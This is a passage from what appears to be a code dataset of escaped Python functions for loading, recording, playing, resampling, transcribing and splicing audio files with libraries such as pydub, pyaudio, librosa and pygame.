sig) = wavefile.load(path.split(filename)[1])\n signal = sig[0]\n\n duration = len(signal) / rate\n reporting(f\"Done. Duration={duration}\")\n return signal", "def load_audio_data(file_path, config):\n pure_path = pathlib.PurePath(file_path)\n audio_seg = pydub.AudioSegment.from_file(pure_path, pure_path.suffix[1:])\n if audio_seg.frame_rate != config.sample_rate_hertz:\n raise ValueError(\"Mismatch in sample rate: expected: %d; got: %d\" % (\n config.sample_rate_hertz, audio_seg.frame_rate))\n if audio_seg.channels != config.audio_channel_count:\n raise ValueError(\n \"Mismatch in audio channel count: expected: %d; got: %d\" % (\n config.audio_channel_count, audio_seg.channels))\n samples = list(audio_seg.get_array_of_samples())\n # NOTE(cais): We currently use LINEAR16 in the stream requests regardless of\n # the original audio file format. 
Is it possible to avoid converting FLAC to\n # LINEAR16 during these cloud requests?\n return struct.pack('<%dh' % len(samples), *samples)", "def read_process_song(path, window=1, overlap=0, debug=True):\n\n arr_features = []\n\n signal, sr = librosa.load(path)\n signal = signal[:660000]\n\n # Debug process\n if debug:\n print(\"Reading file: {}\".format(path))\n\n # Split songs:\n samples = split_songs(signal, window, overlap)\n\n # Append the result to the data structure\n for s in samples:\n features = get_features(s, sr)\n arr_features.append(features)\n return arr_features", "def play_audio_file(self, fname=DETECT_DONG):\n ding_wav = wave.open(fname, 'rb')\n ding_data = ding_wav.readframes(ding_wav.getnframes())\n # with no_alsa_error():\n audio = pyaudio.PyAudio()\n stream_out = audio.open(\n format=audio.get_format_from_width(ding_wav.getsampwidth()),\n channels=ding_wav.getnchannels(),\n rate=ding_wav.getframerate(), input=False, output=True)\n stream_out.start_stream()\n stream_out.write(ding_data)\n time.sleep(0.2)\n stream_out.stop_stream()\n stream_out.close()\n audio.terminate()", "def read(f, normalized=False):\r\n a = pydub.AudioSegment.from_mp3(f)\r\n y = np.array(a.get_array_of_samples())\r\n if a.channels == 2:\r\n y = y.reshape((-1, 2))\r\n if normalized:\r\n return a.frame_rate, np.float32(y) / 2**15\r\n else:\r\n return a.frame_rate, y", "def modulated_play(file_name,\n sample_rate = 44100,\n chunk = 1024,\n channel = 1,\n width = 2):\n\n data = np.fromfile(file_name, dtype = np.uint8)\n wave = custom.modulate(data)\n\n p = pyaudio.PyAudio()\n\n stream = p.open(format = p.get_format_from_width(width),\n channels = channel,\n rate = sample_rate,\n output = True)\n\n stream.write(wave)\n\n stream.stop_stream()\n stream.close()\n p.terminate()", "def splice_audio(file_path, start, end):\n audio = AudioSegment.from_mp3(file_path)\n\n # Pull thumbnail\n tags = ID3(file_path)\n thumbnail = tags.get(\"APIC:\").data\n\n # Pull any other tags from og audio file\n tags = mediainfo(file_path).get('TAG', {})\n\n # Get start and and end paramters\n # to pull the audio splice of interest\n start = timestamp_to_milliseconds(start)\n end = timestamp_to_milliseconds(end)\n\n spliced = audio[start:end]\n spliced.export(\n file_path,\n format=\"mp3\",\n tags=tags\n )\n\n audiofile = eyed3.load(file_path)\n audiofile.tag.images.set(3, thumbnail, 'image/jpeg')\n audiofile.tag.save()", "def load(filename):\n root,ext = _os_path.splitext(filename)\n loader = LOADER[ext]\n frequency,raw_signal = loader(filename)\n iinfo = _numpy.iinfo(raw_signal.dtype)\n raw_signal_midpoint = (iinfo.max + iinfo.min)/2.\n raw_signal_range = iinfo.max - raw_signal_midpoint\n unit_output_signal = (raw_signal - raw_signal_midpoint)/raw_signal_range\n return (frequency, unit_output_signal)", "def record():\n p = pyaudio.PyAudio()\n stream = p.open(format=FORMAT, input_device_index=0, channels=1, rate=RATE, input=True, output=True, frames_per_buffer=CHUNK_SIZE)\n num_silent = 0\n snd_started = False\n\n r = array('h')\n while 1:\n snd_data = array('h', stream.read(CHUNK_SIZE, exception_on_overflow = False))\n if byteorder == 'big':\n snd_data.byteswap()\n r.extend(snd_data)\n\n silent = is_silent(snd_data)\n if silent and snd_started:\n num_silent += 1\n elif not silent and not snd_started:\n print(\"Sound started.\")\n snd_started = True\n\n if snd_started and num_silent> 10:\n break\n\n sample_width = p.get_sample_size(FORMAT)\n stream.stop_stream()\n stream.close()\n p.terminate()\n\n r = normalize(r)\n #r = 
trim(r)\n #r = add_silence(r, 0.5)\n return sample_width, r", "def load_wav(wav_file):\n rate, data = wavfile.read(wav_file)\n return rate, data", "def load_and_get_stats(filename):\n\n import scipy.io.wavfile as siow\n sampling_rate, amplitude_vector = siow.read(filename)\n\n wav_length = amplitude_vector.shape[0] / sampling_rate\n\n return sampling_rate, amplitude_vector, wav_length", "def loadTTLPulse(file, n_channels = 2, fs = 20000, track = 0, mscope = 1):\n f = open(file, 'rb')\n startoffile = f.seek(0, 0)\n endoffile = f.seek(0, 2)\n bytes_size = 2 \n n_samples = int((endoffile-startoffile)/n_channels/bytes_size)\n f.close()\n with open(file, 'rb') as f:\n data = np.fromfile(f, np.uint16).reshape((n_samples, n_channels))\n \n ch_track = data[:,track].astype(np.int32)\n peaks,_ = scipy.signal.find_peaks(np.diff(ch_track), height=30000)\n timestep = np.arange(0, len(data))/fs\n peaks+=1\n ttl_track = pd.Series(index = timestep[peaks], data = data[peaks,track]) \n\n ch_mscope = data[:,mscope].astype(np.int32)\n peaks,_ = scipy.signal.find_peaks(np.abs(np.diff(ch_mscope)), height=30000)\n peaks+=1\n ttl_mscope = pd.Series(index = timestep[peaks], data = data[peaks,mscope])\n\n return ttl_track, ttl_mscope", "def __init__(self,\n words_per_minute=15.0,\n tone_frequency=500.0,\n sample_rate=11025,\n audio_file_name='morse.wav'):\n self.words_per_minute = words_per_minute\n self.dot_time_in_msec = 0.0\n self.tone_frequency = tone_frequency\n self.sample_rate = sample_rate\n self.sample_period = 1.0 / float(self.sample_rate)\n self.audio_file_name = audio_file_name\n # Buffers to cache synthesized sample data.\n self.pulse_shaping_list = []\n self.dot_sample_buffer = None\n self.dash_sample_buffer = None\n self.silence_4_sample_buffer = None\n self.silence_2_sample_buffer = None\n self.silence_1_sample_buffer = None\n # The main sample buffer.\n self.sample_buffer = None\n # Text queue data.\n self.text_queue = queue.Queue()\n self.stop_and_clear_queue = False\n # Set the dot time in milliseconds based on the sending speed.\n self.set_words_per_minute(self.words_per_minute)\n # Initialize the sample buffers.\n self._cache_dot_dash_sample_data()\n self._cache_silence_sample_data()\n # Audio data.\n self.player = None\n self.audio_finished_event = threading.Event()\n self.audio_thread_continue = True\n threading.Thread.__init__(self)\n # The inherited threading.start() methods calls the\n # derived self.run() method in another thread.\n self.start()", "def __init__(self, dbpath, seconds=3):\n\n self.dbpath = dbpath\n self.CHUNK = 2048\n self.FORMAT = pyaudio.paInt16\n self.CHANNELS = 1\n self.RATE = 44100\n self.RECORD_SECONDS = seconds\n\n self.p = pyaudio.PyAudio()\n self.stream = self.p.open(format=self.FORMAT, channels=self.CHANNELS, rate=self.RATE, input=True, frames_per_buffer=self.CHUNK, input_device_index=1)\n self.frames = deque()\n\n try:\n for i in range(0, int(self.RATE / self.CHUNK * self.RECORD_SECONDS)):\n data = self.stream.read(self.CHUNK)\n self.frames.append(data)\n except:\n pass\n\n self.AudioThread = threading.Thread(target=self._read_loop, args=())\n self.AudioThread.start()", "def record_audio(self):\n stream = self.audio.open(format=DEFAULT_FORMAT,\n channels=DEFAULT_CHANNELS,\n rate=DEFAULT_RATE,\n input=True,\n frames_per_buffer=DEFAULT_CHUNK_SIZE)\n\n print(\"Recording...\")\n\n for i in range(0, int(DEFAULT_RATE / DEFAULT_CHUNK_SIZE * RECORD_SECONDS)):\n data = stream.read(DEFAULT_CHUNK_SIZE)\n self.frames.append(data)\n\n print(\"Done.\")\n\n 
stream.stop_stream()\n stream.close()", "def record_audio(self, time):\n p = pyaudio.PyAudio()\n stream = p.open(format=self.format,\n channels=self.channels,\n rate=self.rate,\n input=True,\n frames_per_buffer=self.chunk)\n\n print(\"* recording\")\n\n frames = []\n for i in range(0, int(self.rate / self.chunk * time)):\n data = stream.read(self.chunk)\n frames.append(data)\n\n print(\"* done recording\")\n\n stream.stop_stream()\n stream.close()\n p.terminate()\n return p.get_sample_size(self.format), b''.join(frames)", "def rec_one_shot(self, sec, file_name=None):\n self.__open_noncallback_stream()\n frames = []\n for i in range(int(self.RATE / self.CHUNK * sec)):\n data = self.stream.read(self.CHUNK)\n data = np.fromstring(data, dtype=np.int16)\n frames.append(data)\n self.stream.stop_stream()\n if file_name is not None:\n with wave.open(file_name, 'wb') as wav_file:\n wav_file.setnchannels(self.CHANNELS)\n wav_file.setsampwidth(self.recorder.get_sample_size(self.FORMAT))\n wav_file.setframerate(self.RATE)\n wav_file.writeframes(b''.join(frames))\n frame = np.concatenate(frames, 0)\n self.stop_streaming()\n return frame", "def load_wav_file(file_path: str):\n rate, data = wavfile.read(file_path)\n return rate, data", "def load_segment(self):\n \n data = pd.read_csv(self.metadata['file_info']['path'], header = [0, 1], index_col = 0, parse_dates=True)\n \n # Check cycle length against 5 minute duration minimum\n cycle_len_secs = (data.index[-1] - data.index[0]).total_seconds()\n self.data = data\n \n diff = data.index.to_series().diff()[1:2]\n s_freq = 1000000/diff[0].microseconds\n\n self.metadata['file_info']['start_time'] = str(data.index[0])\n self.metadata['analysis_info'] = {'s_freq': s_freq, 'cycle_len_secs': cycle_len_secs}\n self.s_freq = s_freq\n\n print('EEG successfully imported.')", "def load_wav(file_path):\n sample_rate, data = wavfile.read(file_path)\n return data, sample_rate", "def load_audio(path, target_fs=None):\n y, fs = sf.read(path)\n if y.ndim>1:\n y = np.mean(y, axis=1)\n if target_fs is not None and fs!=target_fs:\n #print('Resampling %d->%d...' 
%(fs, target_fs))\n y = librosa.resample(y, orig_sr=fs, target_sr=target_fs)\n fs = target_fs\n return y, fs", "def analyzeWAV(inputFile):\n data, fs, nbits = audiolab.wavread(inputFile)\n samplingRate = fs\n return [data, samplingRate]", "def play_audio(file: str) -> None:\n pygame.mixer.init()\n pygame.mixer.music.load(file)\n pygame.mixer.music.play()\n\n while pygame.mixer.music.get_busy():\n continue", "def playmusic(self, soundfile):\n clock = pygame.time.Clock()\n pygame.mixer.music.load(soundfile)\n pygame.mixer.music.play()\n while pygame.mixer.music.get_busy():\n clock.tick(FRAMERATE)", "def load_audio_files(path, single_bar=True):\n\n audios = []\n\n for file_root, dirs, files in os.walk(path):\n for name in files:\n # be careful not to get stuck in wrong files like .DS_Store\n if not re.match(r'.*wav', name):\n continue\n name = os.path.join(file_root, name)\n data, sr = sf.read(name)\n assert sr == 44100\n\n if len(data.shape) == 2 and data.shape[1] == 2:\n data = 0.5 * (data[:, 0] + data[:, 1])\n\n # We only use the 2nd bar out of 4\n if single_bar:\n if data.shape[0] >= 4*44100:\n data = data[2*44100:4*44100]\n else:\n data = data[:2*44100]\n\n data = data.astype(np.float32)\n data = torch.from_numpy(data).unsqueeze(dim=0)\n audios.append(data)\n\n return audios", "def load_wav(file_name):\n fs, signal = wavfile.read(file_name)\n signal = np.float32(signal) / (2**(16)/2-1)\n return fs, signal", "def get_audio():\n\tbuf = None\n\tnum_new_bytes = BUFFER_SIZE // REFRESH_BUFFER_FACTOR\n\twith open(INFILE) as fifo:\n\t\twhile True:\n\t\t\tif buf is None:\n\t\t\t\tbuf = fifo.read(BUFFER_SIZE)\n\t\t\telse:\n\t\t\t\tbuf = buf[num_new_bytes:] + fifo.read(num_new_bytes)\n\t\t\tyield buf", "def load_audio_data(self):\n\n self.audio_data = tkFileDialog.askopenfilename()\n self.audio_data_parser = RawAudioDataParser(self.audio_data)\n\n self.audio_entries = sorted(self.audio_data_parser.entries, key=self.get_count, reverse=True)\n\n for index, entry in enumerate(self.audio_entries):\n self.audio_box.insert(index, entry.word)", "def play(filename):\n SoundClient(blocking=True).playWave(filename)", "def get_audio_file_duration_sec(file_path):\n pure_path = pathlib.PurePath(file_path)\n audio_seg = pydub.AudioSegment.from_file(pure_path, pure_path.suffix[1:])\n return audio_seg.duration_seconds", "def load_wav_to_torch(self, full_path):\n data, sampling_rate = load(full_path, sr=self.sampling_rate)\n data = 0.95 * normalize(data)\n\n if self.augment:\n amplitude = np.random.uniform(low=0.3, high=1.0)\n data = data * amplitude\n\n return torch.from_numpy(data).float(), sampling_rate", "def to_voice(item):\r\n item.seek(0)\r\n item = AudioSegment.from_file(item)\r\n m = io.BytesIO()\r\n m.name = \"voice.ogg\"\r\n item.split_to_mono()\r\n dur = len(item) / 1000\r\n item.export(m, format=\"ogg\", bitrate=\"64k\", codec=\"libopus\")\r\n m.seek(0)\r\n return m, dur", "def speech_recognize_continuous_from_file():\n done = False\n\n def stop_cb(evt):\n \"\"\"callback that stops continuous recognition upon receiving an event `evt`\"\"\" \n speech_recognizer.stop_continuous_recognition()\n nonlocal done\n done = True\n\n speech_recognizer.recognized.connect(lambda evt: combine_text(evt)) \n speech_recognizer.session_stopped.connect(stop_cb)\n speech_recognizer.canceled.connect(stop_cb)\n # Start continuous speech recognition\n speech_recognizer.start_continuous_recognition()\n while not done:\n time.sleep(.5)", "def get_large_audio_transcription(path):\n # open the audio file using pydub\n r = 
sr.Recognizer()\n sound = AudioSegment.from_mp3(path)\n sound.export(\"tmp.wav\", format=\"wav\")\n sound = AudioSegment.from_wav('tmp.wav')\n # split audio sound where silence is 700 miliseconds or more and get chunks\n chunks = split_on_silence(sound,\n # experiment with this value for your target audio file\n min_silence_len = 500,\n # adjust this per requirement\n silence_thresh = sound.dBFS-14,\n # keep the silence for 1 second, adjustable as well\n keep_silence=500,\n )\n folder_name = \"audio-chunks\"\n # create a directory to store the audio chunks\n if not os.path.isdir(folder_name):\n os.mkdir(folder_name)\n whole_text = \"\"\n\n chapter=(str(path.split('/')[-1])).split('_')[3]\n # if chapter == '01':\n # target=2\n # else:\n # target=1\n target=2\n # process each chunk\n for i, audio_chunk in enumerate(chunks, start=1):\n # export audio chunk and save it in\n # the `folder_name` directory.\n if i==1:\n chunk_filename = os.path.join(folder_name, f\"chunk{i}.wav\")\n audio_chunk.export(chunk_filename, format=\"wav\")\n # recognize the chunk\n with sr.AudioFile(chunk_filename) as source:\n audio_listened = r.record(source)\n # try converting it to text\n try:\n text = r.recognize_google(audio_listened,language=\"en-US\")\n\n except sr.UnknownValueError as e:\n print(\"Error:\", str(e))\n else:\n #text = f\"{text.capitalize()}. \"\n #print(chunk_filename, \":\", text)\n whole_text += text\n # return the text for all chunks detected\n else:\n chunk_filename = os.path.join(folder_name, f\"chunk{i}.wav\")\n audio_chunk.export(chunk_filename, format=\"wav\")\n # recognize the chunk\n with sr.AudioFile(chunk_filename) as source:\n audio_listened = r.record(source)\n # try converting it to text\n try:\n text = r.recognize_google(audio_listened, language=\"en-US\")\n\n except sr.UnknownValueError as e:\n print(\"Error:\", str(e))\n else:\n #text = f\"{text.capitalize()}. 
\"\n # print(chunk_filename, \":\", text)\n if chapter == '01':\n whole_text += ' ' +text\n if str(text).isalnum():\n if str(text).split(' ')[0]==' ':\n whole_text += text\n else: whole_text += ' '+text\n # return the text for all chunks detected\n\n if i==target:\n break\n if os.path.isfile('tmp.wav') :os.remove('tmp.wav')\n subprocess.run([\"rm\", \"-rf\", folder_name])\n return whole_text", "def read_wav(wav_file):\n w = wave.open(wav_file)\n n = 60 * 10000\n if w.getnframes() < n * 2:\n raise ValueError('Le fichier est trop court')\n frames = w.readframes(n)\n wav_data1 = struct.unpack('%dh' % n, frames)\n frames = w.readframes(n)\n wav_data2 = struct.unpack('%dh' % n, frames)\n return wav_data1, wav_data2", "def audio_resample(self, data):\n\n data = np.asarray(data)\n if data.ndim <= 1:\n logging.log_first_n(logging.INFO,\n 'Converting %s sound from shape %s to 2-D' %\n (self._name, data.shape), 5)\n data = np.reshape(data, (-1, 1))\n if data.shape[1] > data.shape[0]:\n logging.log_first_n(logging.INFO,\n 'Transposing %s sound from shape %s' %\n (self._name, data.shape), 5)\n data = np.transpose(data)\n\n # Get half window size in seconds.\n half_window_size = 0.5 * self._window / self._fs_out\n\n # Concatenate and update buffer.\n if self._buff is not None:\n data = np.concatenate((self._buff, data), axis=0)\n tau = self._buff.shape[0]\n else:\n tau = 0\n self._buff = data[-int(self._fs_in * half_window_size):, :]\n\n # Get i/o data dimensions.\n frames_in = data.shape[0]\n frames_out = int(round((frames_in - tau) / self._fs_in * self._fs_out))\n\n # Resample data via moving average.\n data_out = np.zeros((frames_out, data.shape[1]))\n if self._fs_out < self._fs_in or self._window > 1:\n for i in range(frames_out):\n t = float(i) / self._fs_out # center of window in seconds\n t1 = int(max(0, round(self._fs_in * (t - half_window_size)) + tau))\n t2 = int(min(frames_in,\n round(self._fs_in * (t + half_window_size)) + tau))\n data_out[i, :] = np.mean(data[t1:t2, :], axis=0)\n\n else:\n\n data_out = data\n\n return data_out", "def read_audio(filename, sample_rate = 44100):\n loader = essentia.standard.MonoLoader(filename = filename, sampleRate = sample_rate)\n audio = loader()\n return audio", "def load_wav_to_torch(full_path):\n sampling_rate, data = read(full_path)\n return torch.from_numpy(data).float(), sampling_rate", "def read_wav(fname, normalize=True):\n # samps_int16: N x C or N\n # N: number of samples\n # C: number of channels\n sampling_rate, samps_int16 = wavfile.read(fname)\n # N x C => C x N\n samps = samps_int16.astype(np.float)\n # tranpose because I used to put channel axis first\n if samps.ndim != 1:\n samps = np.transpose(samps)\n # normalize like MATLAB and librosa\n if normalize:\n samps = samps / MAX_INT16\n return sampling_rate, samps", "def record():\n p = pyaudio.PyAudio()\n stream = p.open(format=FORMAT, channels=1, rate=RATE,\n input=True, output=True,\n frames_per_buffer=CHUNK_SIZE)\n\n num_silent = 0\n snd_started = False\n\n r = array('h')\n\n while 1:\n # little endian, signed short\n snd_data = array('h', stream.read(CHUNK_SIZE))\n if byteorder == 'big':\n snd_data.byteswap()\n r.extend(snd_data)\n\n silent = is_silent(snd_data)\n\n if silent and snd_started:\n num_silent += 1\n elif not silent and not snd_started:\n snd_started = True\n\n if snd_started and num_silent > 30:\n break\n\n sample_width = p.get_sample_size(FORMAT)\n stream.stop_stream()\n stream.close()\n p.terminate()\n\n r = normalize(r)\n r = trim(r)\n r = add_silence(r, 0.5)\n return 
sample_width, r", "def play(path):\n sound = AudioSegment.from_mp3(path)\n playback.play(sound)", "def mix_in_audio_sample(track_data, track_offset, sample_data, sample_offset,\n clip_duration, sample_volume, ramp_in, ramp_out):\n ramp_out_index = clip_duration - ramp_out\n track_end = min(track_offset + clip_duration, track_data.shape[0])\n track_end = min(track_end,\n track_offset + (sample_data.shape[0] - sample_offset))\n sample_range = track_end - track_offset\n for i in range(sample_range):\n if i < ramp_in:\n envelope_scale = i / ramp_in\n elif i > ramp_out_index:\n envelope_scale = (clip_duration - i) / ramp_out\n else:\n envelope_scale = 1\n sample_input = sample_data[sample_offset + i]\n track_data[track_offset\n + i] += sample_input * envelope_scale * sample_volume", "def readFramesAtTime(\n audiofile: wave.Wave_read, startTime: float, endTime: float\n) -> bytes:\n params = audiofile.getparams()\n frameRate = params[2]\n\n audiofile.setpos(round(frameRate * startTime))\n frames = audiofile.readframes(round(frameRate * (endTime - startTime)))\n\n return frames", "def inputwav(filename):\n data, sr = sf.read(filename)\n print('Decoding \"'+filename+'\"...')\n print('Sample rate is '+str(sr)+'...')\n try:\n ch=len(data[0,])\n except:\n ch=1\n print('File contains '+str(ch)+' audio channel(s)...')\n #Reshape the data so other functions can interpret the array if mono.\n #basically transposing the data\n if ch==1:\n data=data.reshape(-1,1)\n n=len(data)\n #This prevents log(data) producing nan when data is 0\n data[np.where(data==0)]=0.00001\n #convert to dB\n data_dB=20*np.log10(abs(data))\n return n, data,data_dB,sr, ch", "def view(filename):\n n, data, data_dB,sr,ch=inputwav(filename)\n t=np.linspace(0,n/sr,n)\n py.close()\n fig, (ax1) = py.subplots(nrows=1) \n ax1.plot(t[0:n:100],data[0:n:100],'k-',linewidth=1,label=filename)\n ax1.legend(loc=1)\n ax1.set_ylabel('Amplitude (Rel. 
Bit)')\n ax1.set_xlabel('Time (s)')", "def file2spec(path_file, scale_spec=\"linear\", N_MELS=40, window_length=0.020, overlap=0.5, f_max=15000, duration=None):\r\n\r\n # Load audio file\r\n x_fs, x = load_audio(path_file)\r\n\r\n shape = np.shape(x)\r\n # If the file contains several channel\r\n if len(shape) > 1:\r\n x = np.sum(x, axis=1)\r\n if duration is not None:\r\n x = x[:int(x_fs * duration) + 1]\r\n\r\n # Derive FFT parameters\r\n N_FFT = int(window_length * x_fs) + 1\r\n HOP_LEN = int(overlap * window_length * x_fs) + 1\r\n\r\n # Compute spectrograms\r\n if (scale_spec == \"linear\"):\r\n frequency_resolution = x_fs / N_FFT\r\n size_frequency_axis = 1 + floor(f_max / frequency_resolution)\r\n f, t, spec = signal.stft(x, fs=x_fs, nperseg=N_FFT, noverlap=HOP_LEN)\r\n # scipy returns a complex array, only the modulus is used in spectograms\r\n spec = np.abs(spec)\r\n # remove frequency above f_max\r\n if f[-1] > f_max:\r\n fsup_to_fmax = np.where(f > f_max)\r\n f = f[0:fsup_to_fmax[0][0] + 1]\r\n spec = spec[0:fsup_to_fmax[0][0] + 1, :]\r\n\r\n elif (scale_spec == \"MEL\"):\r\n # librosa library does not give access to t and f\r\n spec = librosa.feature.melspectrogram(x, sr=x_fs, n_fft=N_FFT, hop_length=HOP_LEN, n_mels=N_MELS)\r\n spec = np.abs(spec)\r\n t = None\r\n f = None\r\n\r\n else:\r\n raise ValueError(f\"Wrong scale_spec parameter {scale_spec}, use linear or MEL\")\r\n\r\n # Convert power to dB with the minimum as a reference, only positive dB\r\n spec = librosa.power_to_db(spec, ref=np.min(spec))\r\n\r\n return spec, t, f, x_fs", "def from_file_list(\n cls,\n audio_file_list,\n target_sr=None,\n int_values=False,\n offset=0,\n duration=0,\n trim=False,\n channel_selector=None,\n *args,\n **kwargs,\n ):\n if isinstance(channel_selector, int):\n # Shortcut when selecting a single channel\n if channel_selector >= len(audio_file_list):\n raise RuntimeError(\n f'Channel cannot be selected: channel_selector={channel_selector}, num_audio_files={len(audio_file_list)}'\n )\n # Select only a single file\n audio_file_list = [audio_file_list[channel_selector]]\n # Reset the channel selector since we applied it here\n channel_selector = None\n\n samples = None\n\n for a_file in audio_file_list:\n # Load audio from the current file\n a_segment = cls.from_file(\n a_file,\n target_sr=target_sr,\n int_values=int_values,\n offset=offset,\n duration=duration,\n channel_selector=None,\n trim=False, # Do not apply trim to individual files, it will be applied to the concatenated signal\n *args,\n **kwargs,\n )\n\n # Only single-channel individual files are supported for now\n if a_segment.num_channels != 1:\n raise RuntimeError(\n f'Expecting a single-channel audio signal, but loaded {a_segment.num_channels} channels from file {a_file}'\n )\n\n if target_sr is None:\n # All files need to be loaded with the same sample rate\n target_sr = a_segment.sample_rate\n\n # Concatenate samples\n a_samples = a_segment.samples[:, None]\n\n if samples is None:\n samples = a_samples\n else:\n # Check the dimensions match\n if len(a_samples) != len(samples):\n raise RuntimeError(\n f'Loaded samples need to have identical length: {a_samples.shape} != {samples.shape}'\n )\n\n # Concatenate along channel dimension\n samples = np.concatenate([samples, a_samples], axis=1)\n\n # Final setup for class initialization\n samples = np.squeeze(samples)\n sample_rate = target_sr\n\n return cls(\n samples, sample_rate, target_sr=target_sr, trim=trim, channel_selector=channel_selector, *args, **kwargs,\n )", "def 
test_load_mp3_file_total_tracks(self):\n track = Track.from_filename(self.track_path('silence-totalnum.mp3'))\n self.assertEqual(track.artist, 'Artist')\n self.assertEqual(track.album, 'Album')\n self.assertEqual(track.title, 'Track')\n self.assertEqual(track.tracknum, 1)\n self.assertEqual(track.seconds, 2.0)", "def record(options):\n signal = audio.record(rate=22050, secs=options.secs,\n store=True, opath=options.opath)\n if options.plot:\n plotter.plot(**{options.opath: signal.data})", "def compute_chunk_features(mp3_file):\n # On convertit le fichier mp3 en un fichier wav mono, 1avec un sample rate de 10000Hertz: on utilise\n # On utilise l'application sox \"c:/Program Files (x86)/sox-14.4.0/sox\"\n\n sox_command = \"./sox-14.4.0/sox\"\n out_file = 'temp.wav'\n #cmd = sox_command % (out_file, mp3_file)\n temp2 = subprocess.call([sox_command, mp3_file,'-r 10000','-c 1',out_file])\n # Read in chunks of data from WAV file\n wav_data1, wav_data2 = read_wav(out_file)\n # We'll cover how the features are computed in the next section!\n return np.array(features(wav_data1)), np.array(features(wav_data2))", "def crop_to_segments(audio, rate, segments):\n crop_start = min(segment.start_frame for segment in segments)\n crop_end = max(segment.end_frame for segment in segments)\n\n for segment in segments:\n segment.start_frame -= crop_start\n segment.end_frame -= crop_start\n\n return audio[crop_start:crop_end], rate, segments", "def read_wav(filename, offset=0, nframes=None, dtype=torch.double):\n\n if nframes is None: # Load whole file\n fs, x = wavfile.read(filename, mmap=False)\n x = torch.tensor(x, dtype=dtype)\n x.unsqueeze_(dim=0)\n\n else: # Load a part\n with wave.open(filename) as f:\n fs = f.getframerate()\n f.setpos(offset)\n buff = f.readframes(nframes)\n x = torch.tensor(np.frombuffer(buff, np.int16), dtype=dtype)\n x.unsqueeze_(dim=0)\n x -= x.mean()\n\n return x.to(DEVICE), fs", "def numpy_from_audio(audio_file, downsample_factor = None):\n sample_rate, samples = wavfile.read(audio_file.replace('\\'',''))\n if downsample_factor is not None:\n samples = signal.resample(samples, len(samples) // downsample_factor)\n sample_rate //= downsample_factor\n drop_samples = -(len(samples) % sample_rate)\n return samples[:drop_samples], sample_rate", "def play_music1(music_file):\n clock = pygame.time.Clock()\n try:\n pygame.mixer.music.load(music_file)\n print (\"Music file %s loaded!\" % music_file)\n except pygame.error:\n print (\"File %s not found! 
(%s)\" % (music_file, pygame.get_error()))\n return\n pygame.mixer.music.play()\n while pygame.mixer.music.get_busy():\n # check if playback has finished\n clock.tick(30)", "def read_wav_data(timestamps, wavfile, snapint=[-0.3, -0.2, -0.1, 0, 0.1, 0.2, 0.3], fft_size=1024):\n sig, samplerate = librosa.load(wavfile, sr=None, mono=True)\n data = list()\n\n # normalize sound wave\n # sig = sig / np.sqrt(np.mean(sig**2, axis=0));\n # sig = sig / np.max(np.max(np.abs(sig), axis=0));\n sig = sig / np.max(np.abs(sig))\n\n # calc a length array\n tmpts = np.array(timestamps)\n timestamp_interval = tmpts[1:] - tmpts[:-1]\n timestamp_interval = np.append(timestamp_interval, timestamp_interval[-1])\n\n for sz in snapint:\n data_r = np.array([get_wav_data_at(max(0, min(len(sig) - fft_size, coord + timestamp_interval[i] * sz)),\n sig, samplerate, fft_size=fft_size, freq_high=samplerate//4) for i, coord in enumerate(timestamps)])\n data.append(data_r)\n\n raw_data = np.array(data)\n norm_data = np.tile(np.expand_dims(\n np.mean(raw_data, axis=1), 1), (1, raw_data.shape[1], 1, 1))\n std_data = np.tile(np.expand_dims(\n np.std(raw_data, axis=1), 1), (1, raw_data.shape[1], 1, 1))\n return (raw_data - norm_data) / std_data", "def strech_audio(file_path, stretch_duration=\"00:10:00\"):\n audio = AudioSegment.from_mp3(file_path)\n # Pull thumbnail\n tags = ID3(file_path)\n thumbnail = tags.get(\"APIC:\").data\n\n # Pull any other tags from og audio file\n tags = mediainfo(file_path).get('TAG', {})\n \n # 1. Get the length of audio in seconds\n original_duration = len(audio)\n\n # 2. How many times does stretch_duration\n # overlap original duration\n stretch_duration = timestamp_to_milliseconds(stretch_duration)\n multiplier = int(stretch_duration/original_duration)\n\n # 3. Stretch the audio\n stretched_audio = audio*multiplier\n \n stretched_audio.export(\n file_path,\n format=\"mp3\",\n tags=tags\n )\n\n audiofile = eyed3.load(file_path)\n audiofile.tag.images.set(3, thumbnail, 'image/jpeg')\n audiofile.tag.save()", "def wav_to_raw(path, log=False):\n rate, data = wavfile.read(path)\n if log:\n m, s = divmod(float(len(data))/rate, 60)\n h, m = divmod(m, 60)\n logging.info(\"Original recording length: %d h %d m %d s\" % (h, m, s))\n try:\n if data.shape[1] == 2:\n # If stereo (2-channel), take the average of the two channels.\n data = 0.5 * (data[:, 0] + data[:, 1])\n if log:\n logging.info('Stereo audio')\n except IndexError:\n if log:\n logging.info('Mono audio')\n return rate, data", "def load_audio(ds, num_prefetch=None):\n if num_prefetch is None:\n num_prefetch = TF_AUTOTUNE\n\n logger.info(\"Reading audio files from the path of each element and appending the read signals and their sample rates to each element. 
Number of signals to prefetch: %d.\", num_prefetch)\n\n def _append_signals(x):\n signal, sample_rate = audio_features.read_wav(x[\"path\"])\n return dict(x, signal=signal, sample_rate=sample_rate)\n\n return (ds.map(_append_signals, num_parallel_calls=TF_AUTOTUNE)\n .prefetch(num_prefetch))", "def record():\n p = pyaudio.PyAudio()\n stream = p.open(format=FORMAT, channels=1, rate=RATE,\n input=True, output=True,\n frames_per_buffer=CHUNK_SIZE)\n\n num_silent = 0\n snd_started = False\n\n r = array('h')\n\n while 1:\n # little endian, signed short\n snd_data = array('h', stream.read(CHUNK_SIZE))\n if byteorder == 'big':\n snd_data.byteswap()\n r.extend(snd_data)\n\n silent = is_silent(snd_data)\n\n if silent and snd_started:\n num_silent += 1\n elif not silent and not snd_started:\n snd_started = True\n\n if snd_started and num_silent > SILENCE:\n break\n\n sample_width = p.get_sample_size(FORMAT)\n stream.stop_stream()\n stream.close()\n p.terminate()\n\n r = normalize(r)\n r = trim(r)\n r = add_silence(r, 0.5)\n return sample_width, r", "def load_audio(\n path: Path,\n channel: Optional[int] = None,\n mmap: bool = False,\n channel_names: List[str] = [\"left\", \"right\"],\n) -> MultiTrack:\n multiTrack = MultiTrack()\n assert 0 < len(channel_names) <= 2\n try:\n fs, value = wav_read(path, mmap=mmap)\n except ValueError:\n try:\n import soundfile as sf\n\n value, fs = sf.read(path, dtype=\"int16\")\n except ImportError:\n logging.error(\n f\"Scipy was unable to import {path}, \"\n f\"try installing soundfile python package for more compatability\"\n )\n raise ImportError\n except RuntimeError:\n raise RuntimeError(f\"Unable to import audio file {path}\")\n if value.ndim == 1:\n if channel is not None and channel != 0:\n raise MultiChannelError(\n f\"cannot select channel {channel} from 